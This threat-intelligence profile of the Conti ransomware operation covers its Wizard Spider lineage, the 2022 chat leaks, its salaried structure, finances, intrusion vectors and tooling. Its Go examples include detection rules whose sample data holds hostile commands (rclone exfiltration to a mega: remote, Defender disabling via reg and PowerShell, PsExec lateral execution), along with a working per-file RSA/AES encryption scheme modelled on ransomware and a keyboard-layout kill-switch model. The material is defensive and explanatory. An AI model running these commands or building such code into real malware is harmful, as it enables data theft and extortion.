Conti was the most financially destructive ransomware operation ever documented. Operated by the Russia-based Wizard Spider criminal syndicate, it generated an estimated $180 million in extortion revenue in 2021 alone and accumulated over $2.7 billion across its full operational lifetime (Ryuk and Conti combined). Conti evolved from the TrickBot/Ryuk ecosystem into a full-spectrum Ransomware-as-a-Service empire, run with the organizational structure, HR departments, and professional divisions of a legitimate technology company.
Its implosion in May 2022 was triggered not by law enforcement but by an internal actor: a Ukrainian security researcher who, incensed by Conti's public declaration of support for Russia's invasion of Ukraine, leaked nearly two years of internal communications. The brand collapsed; the organization did not. Core operators dispersed into a constellation of successor groups including Akira, Black Basta, Royal/BlackSuit, and others, several of which continue operating as of May 2026. Conti is the progenitor of the most consequential criminal diaspora in ransomware history.
The Conti brand is defunct as of May 19, 2022. The core operating network, centered on the individual identified as Vitaly Kovalev (alias "Stern"), remains active through successor entities, with shared laundering infrastructure confirmed by TRM Labs through 2026. [1][4][6]
| Field | Detail |
|---|---|
| Status | DEFUNCT (Conti brand, May 2022) / ACTIVE (diaspora entities, 2026) |
| First Observed | December 2019 (Conti deployments); antecedent Ryuk activity from September 2018 |
| Brand Shuttered | May 19, 2022 (AdvIntel confirmation) |
| Operator | Wizard Spider (CrowdStrike); GOLD ULRICK (Secureworks, Conti operators specifically) |
| Origin | Russia (Saint Petersburg assessed; UAE operations hub from ~2020) |
| Revenue Model | Hybrid RaaS: salaried core employees + limited affiliate revenue-sharing |
| Max Single Demand | $25 million (documented FBI figure) |
| Encryption | AES-256 (initial); ChaCha stream cipher (from August 2020, selective) |
| CIS Exclusion | Confirmed behavioral exclusion; binary kill-switch assessed but less publicly documented than peers |
| Decryptor Available | Bitdefender free decryptor (limited applicability; pre-key-rotation variants only) |
| US Reward Outstanding | $10M for leadership ID/location; $5M for arrest/conviction of conspirators |
| Successor Profiles | Akira; Black Basta (defunct); Royal/BlackSuit; Karakurt |
| Date | Event |
|---|---|
| Dec 2019 | First observed Conti deployments, distributed via TrickBot |
| Jun 2020 | CrowdStrike first observes Conti in Big Game Hunting campaigns; full transition from Ryuk |
| Aug 2020 | Conti "Conti News" data leak site launched; ChaCha encryption adopted for speed |
| Oct 2020 | U.S. Cyber Command and Microsoft disrupt the TrickBot botnet; internal chats document Conti's real-time reaction |
| Jan 2021 | Emotet international law enforcement takedown forces Conti reorganization |
| May 2021 | Ireland HSE attack; near-complete shutdown of national health IT network; $20M demand |
| Aug 2021 | Disgruntled affiliate leaks Conti operational playbook (precursor leak) |
| Sep 2021 | CISA/FBI/NSA joint advisory; 400+ documented attacks publicly acknowledged |
| Dec 2021 | Conti is first professional ransomware group to adopt Log4Shell (CVE-2021-44228) |
| Feb 25, 2022 | Conti posts pro-Russia statement on Ukraine invasion |
| Feb 27, 2022 | @ContiLeaks begins publishing internal Jabber logs; 60,000+ messages first tranche |
| Mar 2022 | Conti source code and TrickBot administrator materials leaked; attacks surge despite leaks |
| Apr–May 2022 | Costa Rica attacks; first cyberattack to trigger a national state of emergency |
| May 19, 2022 | Conti brand officially shuttered; all infrastructure taken offline (AdvIntel) |
| Sep 2023 | DOJ unseals three federal indictments against nine Russian nationals; OFAC/FCDO sanction 11 |
| May 2025 | GangExposed begins publishing identities of Conti/TrickBot leadership; BKA names Kovalev |
| May 2026 | Deniss Zolotarjovs sentenced to 102 months: first major custodial sentence for Conti network |
Conti is a technical evolution of Ryuk ransomware, developed and operated by the same core group that CrowdStrike designates WIZARD SPIDER. CrowdStrike first observed Wizard Spider deploying TrickBot for financial fraud in 2016; the group deployed Ryuk in September 2018 for large-scale big game hunting; and between March and June 2020 the group completed its transition to Conti. The Ryuk-Conti-Wizard Spider lineage is corroborated by independent code analysis from multiple vendors, blockchain forensics from TRM Labs, personnel overlap documented in leaked chats, and infrastructure continuity across all three phases. No credible vendor disputes this lineage. [2][9][22]
Critical Rule: WIZARD SPIDER (CrowdStrike) and GOLD ULRICK (Secureworks) are distinct designations applied at different organizational levels. WIZARD SPIDER covers the umbrella criminal organization; GOLD ULRICK specifically designates the Conti ransomware operators. These must not be conflated. Mandiant's UNC1878 covers Wizard Spider broadly and predates the Conti era.
| Vendor | Designation | Scope |
|---|---|---|
| CrowdStrike | WIZARD SPIDER | Umbrella organization; Conti is a WIZARD SPIDER capability/sub-operation |
| Secureworks | GOLD ULRICK | Conti ransomware operators specifically (not the broader Wizard Spider entity) |
| Mandiant | UNC1878 | Wizard Spider parent organization; predates Conti era, applied broadly |
| Palo Alto Unit 42 | Conti Ransomware Gang | Tracked as part of "Ransom Cartel" ecosystem; no distinct proprietary name |
| Recorded Future | Conti | Rated second most prolific ransomware as of June 2024 tracker |
| Microsoft | TrickBot Group / Conti | No widely published distinct Microsoft-proprietary designation |
Note: Secureworks uses GOLD BLACKBURN for broader TrickBot-related criminal activity. Researchers should verify which designation a given vendor report is applying before drawing cross-vendor comparisons.
The Conti Leaks constitute the most comprehensive exposure of a criminal organization in cybersecurity history. The events unfolded across two major waves, beginning on February 27, 2022, and produced the materials that form the evidentiary backbone of most definitive Conti analysis. The account below reconstructs the leak sequence and its investigative significance. [1][2][10]
Prior to the major 2022 leaks, a disgruntled Conti affiliate leaked the group's operational playbook in August 2021, revealing step-by-step intrusion procedures, tool preferences, and exploitation techniques. This prompted the September 2021 CISA/FBI/NSA joint advisory. The playbook leak was an early warning of internal tensions, particularly between affiliates who felt their treatment or revenue share was inadequate relative to the core team's salaried model. [11][43]
The catalytic event was Conti's February 25, 2022 public statement of support for Russia's invasion of Ukraine:
"The Conti Team is officially announcing a full support of Russian government... If anybody will decide to organize a cyberattack or any war activities against Russia, we are going to use all our possible resources to strike back at the critical infrastructures of an enemy."
Conti public statement, February 25, 2022
Within 48 hours, on February 27, 2022, a new Twitter account, @ContiLeaks, began publishing internal Jabber/XMPP chat logs. According to Brian Krebs and Hold Security founder Alex Holden, the leaker was a Ukrainian security researcher acting on patriotic motivation: "The person releasing this is a Ukrainian and a patriot. He's seeing that Conti is supporting Russia in its invasion of Ukraine, and this is his way to stop them in his mind at least." [10]
The initial leak contained 339 JSON files covering January 29, 2021 to February 27, 2022. Subsequent releases reached back to the period June 22, 2020 to November 16, 2020, bringing the corpus to over 170,000 internal chat messages. [2][24]
Krebs on Security published a landmark four-part investigative series based entirely on the leaked logs, constituting the definitive public analysis of Conti's internal operations:
- Part I: Evasion. How Conti detected and responded to law enforcement operations, including the internal reaction when U.S. Cyber Command disrupted TrickBot in September 2020 ("The one who made this garbage did it very well... It's just some kind of sabotage." - leader "Hof"). Crucially, Russian investigators were aware of the TrickBot/Conti investigation but had assured the group the inquiry would be closed by mid-November 2021. [10]
- Part II: The Office. Day-to-day operations, HR practices, salaries, and organizational structure. Documented pervasive burnout, employees pleading for time off, and leaders demanding 24/7 availability. Annual summer vacations in Crimea. Conti's effort to fund legal defense for arrested TrickBot coder Alla Witte, and the cynical suggestion to leverage that relationship for inside intelligence: "Let's try to find a way to her lawyer right now and offer him to directly sell the data bypassing her." [10][23]
- Part III: Weaponry. Conti's $60,000 legitimate Cobalt Strike license, acquired via a $30,000 payment to a front company. Subscriptions to Crunchbase Pro and ZoomInfo for victim research. EDR products (CrowdStrike, SentinelOne, Cylance) used to surveil its own administrators. A corrupt recovery firm negotiator nicknamed "The Spaniard" (described as Romanian, working for a large Canadian recovery firm). A journalist on payroll for 5% of payments to pressure non-paying victims. [23]
- Part IV: Cryptocrime. Founder Stern's obsession with building a proprietary peer-to-peer cryptocurrency platform in Rust, modeled on Ethereum/Polkadot. A $100,000 writing contest on Exploit forum to solicit crypto platform ideas. Evidence of involvement in the SQUID pump-and-dump of October 2021. DDoS-based crypto market manipulation. [40]
On March 2, 2022, @ContiLeaks posted fresh logs, demonstrating the infiltrator retained access to infrastructure Conti had not detected. A separate account, @TrickBotLeaks, posted names, photos, and personal information of TrickBot administrators before being suspended within 24 hours.
The full leaked corpus included: 60,000+ internal Jabber messages (first tranche); full Conti Locker v2 source code; administrator panel source code; decryptor tool source code; Bitcoin addresses and wallet data; negotiation logs; infrastructure documentation; phishing templates; HR materials; and screenshots of the live Conti control panel with compromised host telemetry. [1][30][44]
The leaks initially had minimal operational impact. Secureworks (GOLD ULRICK tracking) noted that Conti victim postings actually increased in March 2022, reaching the second-highest monthly total since January 2021. The deeper damage was reputational and jurisdictional: the Conti brand became toxic for affiliates; victims paying Conti risked OFAC sanctions exposure; and the $15 million U.S. government bounty announced in May 2022 made the brand operationally untenable. The organization's response was strategic dissolution rather than destruction. [13][15][41]
In May 2025, a figure operating as GangExposed launched what The Register described as a "high-stakes intelligence war" against Conti's former leadership. GangExposed published detailed dossiers using OSINT, darknet database purchases, and claimed access to a leaked FSB border control database acquired for approximately $250,000. [18][19]
| Alias | Real Name (GangExposed) | BKA/DOJ Corroboration | Current Status |
|---|---|---|---|
| Stern / Ben / Demon | Vitaly Nikolaevich Kovalev, 36 (Russian) | Confirmed by BKA May 2025; Interpol Red Notice issued | At large in Russia; net worth assessed >$500M crypto |
| Professor | Vladimir Viktorovich Kvitko, 39 (Russian; relocated to Dubai ~2020) | US Rewards for Justice; $10M bounty; "burned" by GangExposed publication | Dubai; assessed actively involved in ongoing operations |
| Target | Unidentified (State Dept photo released Aug 2022) | $10M US bounty; identity not yet publicly confirmed | At large |
| Mango | Mikhail Mikhailovich Tsaryov | DOJ indictment (Sep 2023); GangExposed corroboration | At large in Russia |
| Defender | Andrey Yuryevich Zhuykov | DOJ indictment; UK NCA sanction (Sep 2023) | At large in Russia |
GangExposed's methodology and identity remain unverified. The Kovalev identification is treated as CONFIRMED given independent BKA corroboration. Other identifications are rated CREDIBLE. Technisanct/FalconFeeds assessed the source likely has insider access; other researchers assessed GangExposed could be a former criminal burning former associates. GangExposed stated goals: identify all ~50 key participants, disrupt the Blockchain Life crypto legitimization scheme, and deprive operators of UAE safe haven. [18]
Conti operated a hybrid model unique among ransomware groups. CISA noted in its September 2021 advisory: "It is likely that Conti developers pay the deployers of the ransomware a wage rather than a percentage of the proceeds from a successful attack." The leaked chats confirmed this assessment: Conti maintained a dedicated, salaried workforce of 65-100+ employees paid bimonthly in Bitcoin, with limited external affiliate participation for specific access-broker roles.
Most low-level employees (testers, coders, administrators) earned $1,000–$2,000/month. High-performing coders could earn $5,000–$10,000/month. Senior managers confirmed to Stern on July 18, 2021 that the group employed 62 people; by July 30, payroll had grown to 87. [10][11][23]
The leaked chats documented a corporate-like internal structure with departments, separate budgets, and staff schedules:
- Coders: Programmers writing malicious code and integrating new capabilities
- Testers: Workers testing Conti malware against antivirus products, checking every ~4 hours for new Windows Defender updates
- Administrators: Infrastructure setup, teardown, VPN and server maintenance
- Reverse Engineers ("Reversers"): Disassembling code, studying commercial security products, finding vulnerabilities
- Penetration Testers / Hackers: Front-line operators conducting network intrusions
- OSINT Team: Using Crunchbase Pro, ZoomInfo, SignalHire, Shodan, and Spiderfoot Pro for victim research and financial intelligence
- HR Department: Actively recruiting from Russian job boards (including legitimate employment platforms) and cybercrime forums; reviewing 25–35% of relevant CVs on employment platforms
Conti also maintained what the leaked chats identified as relationships with external access brokers, paying 25–30% of ransom proceeds for specific network access. This was considered suboptimal given its cut into profit margins. [23]
Conti practiced "big game hunting" exclusively, targeting organizations with over $100 million in annual revenue. Ransom demands were typically set as a percentage of the victim's annual revenues. Operators used Crunchbase Pro and ZoomInfo to research victims' insurance coverage, earnings, and investor contacts for leverage. [10][23]
| Element | Detail |
|---|---|
| Ransom range | Up to $25 million per incident (single-victim maximum, FBI documented) |
| Reduction behavior | Reductions common; experienced negotiators could bring demands down substantially (e.g., sub-$100M revenue companies sometimes capped near $1M) |
| Payment deadline | Countdown timer on victim's dark web page; expiry triggered automatic data publication |
| Communication channels | Dark web negotiation portal; ProtonMail; VoIP calls |
| Corrupt insider negotiator | "The Spaniard" (Romanian, large Canadian recovery firm): maintained sympathetic relationship, shared victim internal deliberations with Conti operators |
| Journalist on payroll | As of March 2021, "Alarm" claimed access to a journalist who would write pressure articles against non-paying victims for 5% of payout |
| Double extortion | Primary demand for decryption key; separate demand for data non-publication. Paying for decryption did NOT guarantee data destruction |
| HSE precedent | Ireland HSE provided free decryptor after refusal to pay, but Conti reserved right to publish stolen data. Demonstrates keys and data are separate extortion levers |
| Vector | Detail | Period |
|---|---|---|
| TrickBot infections | Primary initial vector through 2021; distributed via malspam | 2019–2021 |
| BazarLoader / BazarBackdoor | Replaced TrickBot as primary delivery by March 2021 as TrickBot detections improved | 2021–2022 |
| Spear-phishing (malicious Excel) | Macros or links to Google Drive-hosted malware; IcedID dropper files also used | Throughout |
| CVE-2018-13379 | FortiGate SSL VPN path traversal; widely exploited across ransomware groups | Throughout |
| ProxyShell chain | CVE-2021-34473, CVE-2021-34523, CVE-2021-31207 | Aug 2021+ |
| Log4Shell | CVE-2021-44228; Conti assessed (AdvIntel) as the first professional ransomware group to weaponize it, against VMware vCenter | Dec 13, 2021+ |
| PrintNightmare | CVE-2021-34527 (Print Spooler; commonly grouped with the earlier CVE-2021-1675); listed in the CISA/FBI/NSA advisory | Sep 2021 advisory |
| Stolen/weak RDP credentials | Sourced from access brokers and credential markets | Throughout |
| Fake software / SEO poisoning | Documented in CISA advisory | 2021+ |
Log4Shell First-Mover Significance: AdvIntel confirmed Conti was the first professional ransomware operation to adopt and embed CVE-2021-44228 in their attack chain, beginning December 13, 2021, targeting VMware vCenter servers. Within days, the attack chain extended to Emotet deployment followed by Cobalt Strike. This first-mover capability was a consistent Conti signature: rapid weaponization of critical CVEs before patching could occur at scale.
- Cobalt Strike: $60,000 legitimate license acquired via front company. Used for network reconnaissance, lateral movement, and in-memory payload execution.
- Mimikatz / LSASS credential dumping: Privilege escalation; overpass-the-hash Kerberos ticket acquisition documented in DFIR case studies.
- BumbleBee loader: Replaced BazarLoader in later operations (2022).
- SystemBC: Proxy/C2 tunneler for persistent access.
- PsExec + SMB: Lateral movement to distribute Cobalt Strike beacons across domain-joined systems.
- AnyDesk / RDP: Legitimate remote access tools for persistence; RDP sometimes proxied through IcedID process.
- GPO modification: Used to disable Windows Defender across domain; force-updated via Cobalt Strike beacon.
- Rclone / Mega.nz / dedicated VPS: Data exfiltration tooling; Rclone to cloud storage and purpose-built VPS instances for high-volume exfiltration.
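The tooling list above translates directly into endpoint detections. The following Go program is an added example written for this page, not Conti's code or any vendor's rule set: it runs four rules over a constructed set of process-creation records (the field names, host names and command lines are this example's own, not incident data). It flags Rclone pushing data to a named remote, the Defender tamper knobs set via reg.exe or Set-MpPreference, PsExec on both the client and the target side, and AnyDesk running from a user-writable directory. A Defender disable pushed through Group Policy, as the list describes, surfaces as a GPO change (directory-service audit events) rather than as a command line, so the second rule catches the endpoint-side registry and PowerShell variants only.

```go
package main

import (
	"fmt"
	"path/filepath"
	"regexp"
	"strings"
)

// ProcEvent carries the fields of a process-creation record (Sysmon Event ID 1 or
// Security 4688) that the rules consult. Field names are this example's own.
type ProcEvent struct {
	Host, User, Image, Parent, CmdLine string
}

// Alert is one rule firing on one event.
type Alert struct {
	Rule, Host, Image string
}

var (
	// rclone copy/sync/move to a named remote ("mega:", or an operator VPS configured as a remote).
	// Two or more characters before the colon, so drive letters such as C: do not match.
	rcloneRemote = regexp.MustCompile(`(?i)\b(copy|sync|move)\b.*\s[A-Za-z0-9_-]{2,}:`)
	// Defender tamper knobs, whether set via reg.exe, PowerShell Set-MpPreference, or a script.
	defenderKnobs = regexp.MustCompile(`(?i)DisableAntiSpyware|DisableRealtimeMonitoring|DisableBehaviorMonitoring`)
	// A \\HOST target on the PsExec client command line.
	psexecTarget = regexp.MustCompile(`\\\\[A-Za-z0-9._-]+`)
	// Directories a non-admin user can write to; a remote-access tool running from here was not installed by IT.
	userWritable = regexp.MustCompile(`(?i)\\(Temp|AppData|Downloads|Public)\\`)
)

// imageName lowercases the file name of a Windows path (filepath.Base needs forward slashes off Windows).
func imageName(p string) string {
	return strings.ToLower(filepath.Base(strings.ReplaceAll(p, `\`, "/")))
}

// Evaluate runs every rule over every event and returns the matches in event order.
func Evaluate(events []ProcEvent) []Alert {
	var out []Alert
	for _, e := range events {
		img, parent := imageName(e.Image), imageName(e.Parent)
		if (img == "rclone.exe" || strings.Contains(strings.ToLower(e.CmdLine), "rclone")) && rcloneRemote.MatchString(e.CmdLine) {
			out = append(out, Alert{"rclone-exfil", e.Host, img})
		}
		if defenderKnobs.MatchString(e.CmdLine) {
			out = append(out, Alert{"defender-tamper", e.Host, img})
		}
		// Client side: psexec.exe aimed at a remote host. Target side: PSEXESVC spawned by services.exe.
		if (strings.HasPrefix(img, "psexec") && psexecTarget.MatchString(e.CmdLine)) ||
			(img == "psexesvc.exe" && parent == "services.exe") {
			out = append(out, Alert{"psexec-lateral", e.Host, img})
		}
		if img == "anydesk.exe" && userWritable.MatchString(e.Image) {
			out = append(out, Alert{"anydesk-userpath", e.Host, img})
		}
	}
	return out
}

// CountByRule summarises alerts per rule name.
func CountByRule(alerts []Alert) map[string]int {
	counts := make(map[string]int)
	for _, a := range alerts {
		counts[a.Rule]++
	}
	return counts
}

// SampleEvents is a constructed telemetry sample for this example, not data from any real incident.
var SampleEvents = []ProcEvent{
	{"FS01", `CORP\svc-backup`, `C:\Users\Public\rclone\rclone.exe`, `C:\Windows\System32\cmd.exe`,
		`rclone.exe copy "C:\Finance\Shares" mega:corp-fs01 --transfers 32 -q`},
	{"DC01", `CORP\admin`, `C:\Windows\System32\reg.exe`, `C:\Windows\System32\cmd.exe`,
		`reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f`},
	{"WS17", `CORP\j.doe`, `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`, `C:\Windows\System32\cmd.exe`,
		`powershell.exe -nop -c "Set-MpPreference -DisableRealtimeMonitoring $true"`},
	{"WS17", `CORP\j.doe`, `C:\Tools\PsExec.exe`, `C:\Windows\System32\cmd.exe`,
		`PsExec.exe \\FS01 -s -d cmd /c "C:\ProgramData\update.exe"`},
	{"FS01", `NT AUTHORITY\SYSTEM`, `C:\Windows\PSEXESVC.exe`, `C:\Windows\System32\services.exe`, `C:\Windows\PSEXESVC.exe`},
	{"WS17", `CORP\j.doe`, `C:\Users\j.doe\AppData\Local\Temp\AnyDesk.exe`, `C:\Windows\explorer.exe`, `AnyDesk.exe --service`},
	{"WS22", `CORP\a.smith`, `C:\Program Files\AnyDesk\AnyDesk.exe`, `C:\Windows\explorer.exe`, `AnyDesk.exe`},
	{"WS22", `CORP\a.smith`, `C:\Program Files\Git\usr\bin\rsync.exe`, `C:\Windows\System32\cmd.exe`, `rsync -a C:\proj\ D:\backup\`},
}

func main() {
	for _, a := range Evaluate(SampleEvents) {
		fmt.Printf("%-18s host=%s image=%s\n", a.Rule, a.Host, a.Image)
	}
}
```

Run with `go run` to print the six alerts the sample produces; the installed AnyDesk and the rsync backup are left alone. In practice the same fields map onto Sysmon Event ID 1 or Security 4688, and the PSEXESVC rule is the one worth keeping even where PsExec is sanctioned, because it fires on the target host that the attacker actually reached.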
The Conti playbook leak revealed a highly professional approach to dwell time: operators spent weeks inside networks before deploying ransomware. The Ireland HSE attack illustrates this: initial access on March 18, 2021, via a malicious Excel attachment; ransomware detonation not until May 14, 2021, eight weeks later, during which attackers moved across 180 systems and multiple domains. [37]
- Algorithm: AES-256 (initial); ChaCha stream cipher adopted August 2020 for selective, high-speed file encryption.
- Throughput: Multi-threaded engine using up to 32 simultaneous CPU threads. ZDNet documented Conti as using "32 simultaneous CPU threads for blazing-fast encryption" (July 2020).
- Key management: Asymmetric RSA wrapper around symmetric session key; public key embedded in binary, private key held by attackers.
- Variants: Encrypted file extension .ODMUA in some documented variants; ransom note named CONTI_README.txt.
- Decryptor: Bitdefender released a free Conti decryption tool after source code leak; applicability limited to variants encrypted before certain key rotation events.
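The key-management line above is the reason the Bitdefender tool only helps with some variants. The following Go program is an added illustration of that design, written for this page and not taken from the leaked Conti source: the binary ("Build") carries only an RSA public key; each file gets a fresh symmetric key, which is wrapped with RSA-OAEP and stored alongside the ciphertext; only the matching private key can unwrap it. AES-256-GCM stands in for the file cipher because it is in Go's standard library (Conti's later ChaCha variant follows the same wrapping pattern). `RotationDemo` then shows the caveat: a decryptor holding build A's private key recovers A's files and fails at the unwrap step on files from build B, which is what a key rotation means for victims.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
	"io"
)

// Build ships inside the locker binary (public key only); Operator holds the private key.
type Build struct{ Pub *rsa.PublicKey }
type Operator struct{ Priv *rsa.PrivateKey }

// NewOperator makes a fresh key pair; each key rotation is a new Operator.
func NewOperator(bits int) (*Operator, error) {
	k, err := rsa.GenerateKey(rand.Reader, bits)
	if err != nil {
		return nil, err
	}
	return &Operator{Priv: k}, nil
}

func newGCM(key []byte) (cipher.AEAD, error) {
	blk, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(blk)
}

// Lock: fresh 256-bit key per file, AES-256-GCM over the content, RSA-OAEP over the key. Layout: [wrapped key][nonce][ciphertext].
func (b Build) Lock(plaintext []byte) ([]byte, error) {
	fileKey := make([]byte, 32)
	if _, err := io.ReadFull(rand.Reader, fileKey); err != nil {
		return nil, err
	}
	gcm, err := newGCM(fileKey)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, b.Pub, fileKey, nil)
	if err != nil {
		return nil, err
	}
	out := append(wrapped, nonce...)
	return append(out, gcm.Seal(nil, nonce, plaintext, nil)...), nil
}

// Unlock is the decryptor side; OAEP under the wrong private key fails at the unwrap step rather than yielding a key.
func (o *Operator) Unlock(blob []byte) ([]byte, error) {
	wl := o.Priv.Size() // an OAEP ciphertext is exactly one modulus long
	if len(blob) < wl {
		return nil, fmt.Errorf("blob shorter than the wrapped key")
	}
	fileKey, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, o.Priv, blob[:wl], nil)
	if err != nil {
		return nil, fmt.Errorf("unwrap failed (key from a different build?): %w", err)
	}
	gcm, err := newGCM(fileKey)
	if err != nil {
		return nil, err
	}
	ns := gcm.NonceSize()
	if len(blob) < wl+ns {
		return nil, fmt.Errorf("blob shorter than wrapped key plus nonce")
	}
	return gcm.Open(nil, blob[wl:wl+ns], blob[wl+ns:], nil)
}

// RotationDemo locks a constructed file under build A, then tries A's own key and B's post-rotation key.
func RotationDemo() (ownKeyWorks, rotatedKeyWorks bool, err error) {
	a, err := NewOperator(2048)
	if err != nil {
		return false, false, err
	}
	b, err := NewOperator(2048)
	if err != nil {
		return false, false, err
	}
	sample := []byte("constructed sample file: Q3 payroll export") // not real victim data
	blob, err := Build{Pub: &a.Priv.PublicKey}.Lock(sample)
	if err != nil {
		return false, false, err
	}
	pt, errA := a.Unlock(blob)
	_, errB := b.Unlock(blob)
	return errA == nil && bytes.Equal(pt, sample), errB == nil, nil
}

func main() {
	own, rotated, err := RotationDemo()
	fmt.Println("own build key works:", own, "| post-rotation key works:", rotated, "| err:", err)
}
```

The point for responders is that a leaked private key or a published decryptor is bound to the build that embedded the matching public key, so triage starts with identifying which build (and therefore which key generation) touched the files before any decryptor is tried.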
Conti's consistent avoidance of CIS-region targets across more than 1,000 confirmed attacks, with no known exceptions, is an operational signature consistent with an implicit non-prosecution understanding with Russian authorities. Binary analysis indicates Conti checks for Russian keyboard layout installation as a kill switch, consistent with the standard CIS-exclusion pattern used by other Russia-based groups. The behavioral exclusion is documented across all major sector-targeting data; the specific binary implementation details are less publicly documented than peers such as REvil. [9]
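The keyboard-layout kill switch described above is the form of CIS exclusion most commonly reported across Russia-based lockers. The following Go program is an added model of that check, written for this page; it is not the Conti implementation, and the language set it excludes is illustrative rather than the list from any particular build. It takes the list of HKL values that the Windows API GetKeyboardLayoutList would return, strips each to its LANGID (the low 16 bits) and then to the primary language (the low 10 bits, so a sub-variant such as Russian (Moldova) still counts), and aborts if any installed layout, active or not, is on the list.

```go
package main

import "fmt"

// Primary-language IDs (low 10 bits of a Windows LANGID) for CIS-region languages a kill
// switch of this kind typically excludes. Illustrative set for this example, not any build's list.
var cisPrimaryLangs = map[uint16]string{
	0x19: "Russian", 0x22: "Ukrainian", 0x23: "Belarusian", 0x3F: "Kazakh",
	0x43: "Uzbek", 0x44: "Tatar", 0x2B: "Armenian", 0x2C: "Azeri",
	0x37: "Georgian", 0x40: "Kyrgyz", 0x28: "Tajik", 0x42: "Turkmen",
}

// LangID extracts the LANGID from an HKL: the low word (the high word is the layout/device handle).
func LangID(hkl uint32) uint16 { return uint16(hkl & 0xFFFF) }

// PrimaryLang masks a LANGID down to its primary language; the top 6 bits are the sublanguage.
func PrimaryLang(langid uint16) uint16 { return langid & 0x03FF }

// CISLayouts returns the names of installed layouts whose primary language is excluded.
// Every installed layout counts, mirroring GetKeyboardLayoutList; the active layout is not special.
func CISLayouts(installed []uint32) []string {
	var hits []string
	for _, hkl := range installed {
		if name, ok := cisPrimaryLangs[PrimaryLang(LangID(hkl))]; ok {
			hits = append(hits, name)
		}
	}
	return hits
}

// ShouldAbort is the kill-switch decision: refuse to run if any excluded layout is installed.
func ShouldAbort(installed []uint32) bool { return len(CISLayouts(installed)) > 0 }

func main() {
	// Constructed hosts: HKL high word set to the default layout for that language.
	hosts := map[string][]uint32{
		"us-only":        {0x04090409},
		"uk-english":     {0x08090809},             // primary language 0x09, not excluded
		"us-plus-ru":     {0x04090409, 0x04190419}, // Russian installed but not active
		"ru-moldova-sub": {0x04090409, 0x08190819}, // sublanguage differs, primary is still Russian
	}
	for name, hkls := range hosts {
		fmt.Printf("%-15s abort=%v layouts=%v\n", name, ShouldAbort(hkls), CISLayouts(hkls))
	}
}
```

The installed-not-active detail is what makes the well-known "add a Russian keyboard layout" vaccine work against this class of check, and also why it is fragile: a build that consults the active layout, the system locale or the UI language instead is unaffected, which is one reason the page treats the behavioral exclusion as confirmed while rating the binary mechanism as less well documented.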
Conti developed a dedicated Linux/ESXi variant targeting VMware virtual machine infrastructure, consistent with the group's enterprise-focused targeting. This variant was documented by SentinelOne and became a direct template for successor groups. Akira inherited the Conti ESXi playbook and extended it with additional VMware-targeting capabilities documented in joint FBI/CISA advisories. [39]
Conti demanded payment exclusively in Bitcoin (BTC). Chainalysis identified Conti generating at least $180 million in 2021, the highest of any ransomware group that year. Total lifetime revenue across Ryuk/Conti operations is assessed at approximately $2.7 billion. The UK NCA and Chainalysis jointly assessed Conti and TrickBot attempted to extort more than $800 million from victims including hospitals, schools, local authorities, and businesses. [5][17][40]
- Payroll: $1,000–$2,000/month for most employees; $5,000–$10,000 for senior coders; distributed in Bitcoin bimonthly
- Ransom receipts: Single highest documented payment: $25M; Ireland HSE demanded $20M (not paid)
- Costa Rica: $20M demand; government refused; no payment made
Krebs on Security's deep analysis of leaked chats (Part IV: Cryptocrime) documented extensive laundering and investment schemes directed personally by founder "Stern" (Kovalev): [40]
- Proprietary crypto platform: Kovalev was developing a peer-to-peer cryptocurrency platform in Rust, modeled on Ethereum/Polkadot with integrated NFT, DeFi, and DEX functionality, intended as a vehicle to legitimize illicit proceeds.
- $100,000 crypto article contest: Sponsored on the Russian-language Exploit cybercrime forum to solicit intellectual property for the platform while simultaneously serving as criminal recruitment.
- SQUID pump-and-dump: Evidence in chat logs suggests Conti involvement in the October–November 2021 SQUID token scam, which appreciated from $0.01 to $2,856 before the developers extracted approximately $3.38 million.
- DDoS-driven crypto manipulation: An internal scheme involving DDoSing small cryptocurrency mining pools, then posing as distressed users in Discord to drive prices down before purchasing.
- Blockchain Life Forum: GangExposed's 2025 investigation revealed Kovalev and associate Khitrov organized the "Blockchain Life" forum as a legitimization vehicle for illicitly obtained cryptocurrency earnings.
TRM Labs corroborated Conti-Ryuk blockchain ties through salary wallet analysis and on-chain transaction mapping, confirming shared financial infrastructure across both phases of Wizard Spider ransomware operations. In a separate 2023 analysis, TRM documented Conti's re-emergence as three successor groups. TRM Labs' 2026 reporting on Akira specifically confirmed that Conti's successor ecosystem (including Akira) continued sharing laundering infrastructure, providing blockchain continuity evidence linking the diaspora to the original Conti network. [22][4]
- Over 1,000 attacks confirmed globally (FBI/CISA advisory, updated)
- DOJ 2023 indictment figures: more than 900 victims in approximately 47 U.S. states, D.C., Puerto Rico, and approximately 31 foreign countries
- $180M revenue in 2021 alone (Chainalysis); ~$2.7B total (Ryuk/Conti lifetime)
- Over $150M in ransom payments per State Department figures at time of $15M reward announcement
Conti deliberately focused on sectors with low tolerance for downtime and high pressure to pay. Healthcare was the most systematically targeted sector; the FBI documented at least 16 Conti attacks on U.S. healthcare and first-responder networks by May 2021 alone.
| Sector | Targeting Priority | Rationale |
|---|---|---|
| Healthcare / Hospitals | Highest | Life-critical downtime pressure; low tolerance for delay; data sensitivity |
| Emergency Services / First Responders | High | 911 dispatch, EMS; non-negotiable uptime dependency |
| Government (local/national) | High | Political pressure to restore services; large IT budgets imply capacity to pay |
| Education | Moderate-High | Student/staff data leverage; large datasets |
| Critical Infrastructure | Moderate-High | Utilities, transportation; operational impact amplifies ransom pressure |
| Private Enterprise ($100M+ revenue) | High (policy minimum) | Big game hunting threshold; all commercial targets filtered by revenue floor |
Primary targets concentrated in North America (~75% U.S.-based per early FBI figures). Significant European targeting documented (UK: 149 known victims, £27 million extracted per NCA). Consistent behavioral exclusion of CIS-region targets across all documented attacks. [17][28]
| Victim | Date | Impact | Notable Detail |
|---|---|---|---|
